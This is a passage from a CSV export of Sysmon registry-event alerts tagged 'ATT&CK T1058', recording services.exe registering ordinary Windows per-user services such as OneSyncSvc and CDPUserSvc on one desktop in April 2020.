service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.103966200Z"",""eventRecordID"":""589"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.506",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.103682600Z"",""eventRecordID"":""588"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_37a6f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_37a6f\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:45:28.498",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.102212800Z"",""eventRecordID"":""587"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.473",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.102011800Z"",""eventRecordID"":""586"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.414",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.101163100Z"",""eventRecordID"":""585"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:45:28.401",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.100874300Z"",""eventRecordID"":""584"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.389",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.099734000Z"",""eventRecordID"":""583"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:45:28.365",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.099517800Z"",""eventRecordID"":""582"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.348",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.098612300Z"",""eventRecordID"":""581"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 26, 2020 @ 10:45:28.321",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.098361500Z"",""eventRecordID"":""580"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.303",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.097523500Z"",""eventRecordID"":""579"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 26, 2020 @ 10:45:28.285",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.097310900Z"",""eventRecordID"":""578"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.282",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.096528900Z"",""eventRecordID"":""577"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:45:28.232",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.096303500Z"",""eventRecordID"":""576"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.189",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.095451200Z"",""eventRecordID"":""575"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.129",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.095253100Z"",""eventRecordID"":""574"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 